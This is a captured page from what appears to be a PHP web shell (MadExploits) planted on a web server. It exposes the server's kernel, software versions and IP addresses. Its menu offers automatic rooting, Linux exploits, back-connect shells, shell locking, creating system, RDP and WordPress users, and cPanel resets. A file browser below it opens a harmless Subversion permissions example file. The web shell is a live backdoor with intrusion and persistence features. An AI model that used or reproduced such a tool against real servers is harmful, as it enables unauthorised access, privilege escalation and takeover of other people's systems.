Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
subversion-1.7.14 /
hook-scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
mailer
[ DIR ]
drwxr-xr-x
commit-access-control.cfg.exam...
2.91
KB
-rw-r--r--
commit-access-control.pl
11.49
KB
-rwxr-xr-x
commit-email.rb
3.03
KB
-rwxr-xr-x
log-police.py
5.07
KB
-rwxr-xr-x
svn2feed.py
16.33
KB
-rwxr-xr-x
svnperms.conf.example
3.07
KB
-rw-r--r--
svnperms.py
12.93
KB
-rwxr-xr-x
validate-extensions.py
3.43
KB
-rwxr-xr-x
verify-po.py
3.86
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : svnperms.conf.example
## Example configuration file for svnperms.py. ## # $Id: svnperms.conf.example 1028289 2010-10-28 13:20:45Z cmpilato $ # # Multiple global [groups] sections are accepted, but be aware # that it's the same as concatenating them all in a single entry. # You can also create section specific groups, using a syntax # like [sectionname groups]. # [groups] group1 = user1 user2 user3 group2 = user4 user5 supergroup = @group1 @group2 user6 # # Example repository control, showing allowed syntax. # # - the latest match is what counts # - groups are prefixed by "@" # - you can use groups and users in the same definition # - all permissions may be revoked with () # - line breaks are accepted # [example1 groups] group3 = user9 user10 [example1] trunk/.* = *(add,remove,update) @group1,user4,user5(update) user6,user7() trunk/.* = user8(add,update) tags/[^/]+/ = @group3(add) branches/[^/]+/.* = *(add,remove,update) # # One of the most used repository structures, for a single project. # [example2] trunk/.* = *(add,remove,update) tags/[^/]+/ = *(add) branches/[^/]+/.* = *(add,remove,update) # # Another common structure, expecting a project name inside the repository # (like trunk/myproject/ and tags/myproject/). In this example, only admins # are allowed to create projects, and there are project specific access # lists. # [example3 groups] admins = john project1 = user1 user2 project2 = user3 user4 [example3] trunk/[^/]+/ = @admins(add,remove) trunk/project1/.+ = @project1(add,remove,update) trunk/project2/.+ = @project2(add,remove,update) tags/[^/]+/ = @admins(add,remove) tags/project1/[^/]+/ = @project1(add,remove) tags/project2/[^/]+/ = @project2(add,remove) branches/[^/]+/ = @admins(add,remove) branches/project1/[^/]+/.* = @project1(add,remove,update) branches/project2/[^/]+/.* = @project2(add,remove,update) # # A more complex structure, as defined in the following URL: # # http://moin.conectiva.com.br/RepositorySystem # [example4 groups] admins = user1 user2 updaters = user3 [example4] snapshot/[^/]+/(current/(SPECS/|SOURCES/)?)? = *(add) snapshot/[^/]+/ = @admins(add,remove) snapshot/[^/]+/current/SPECS/[^/]+\.spec = *(add,remove,update) snapshot/[^/]+/current/SOURCES/[^/]+ = *(add,remove,update) snapshot/[^/]+/releases/[^/]+/([^/+]/)? = autouser(add) snapshot/[^/]+/pristine/ = autouser(add,remove) branches/[^/]+/.* = *(add,remove,update) releases/[^/]+/ = @admins(add) tags/[^/]+/ = *(add,remove) updates/[^/]+/[^/]+/(current/(SPECS/|SOURCES/)?)? = @updaters,autouser(add) updates/[^/]+/[^/]+/current/SPECS/[^/]+\.spec = @updaters,autouser(add,update) updates/[^/]+/[^/]+/current/SOURCES/[^/]+ = @updaters,autouser(add,remove,update) updates/[^/]+/[^/]+/releases/.* = autouser(add) updates/[^/]+/[^/]+/pristine/ = autouser(add,remove) # # Sections can inherit settings from previously defined sections, using # the "extends" keyword in the section declaration. In this example, # the [example5] section inherits all the settings from [example2], and # adds a new setting for a releases directory which behaves like the # tags directory. # [example5 extends example2] releases/[^/]+/ = *(add)
Close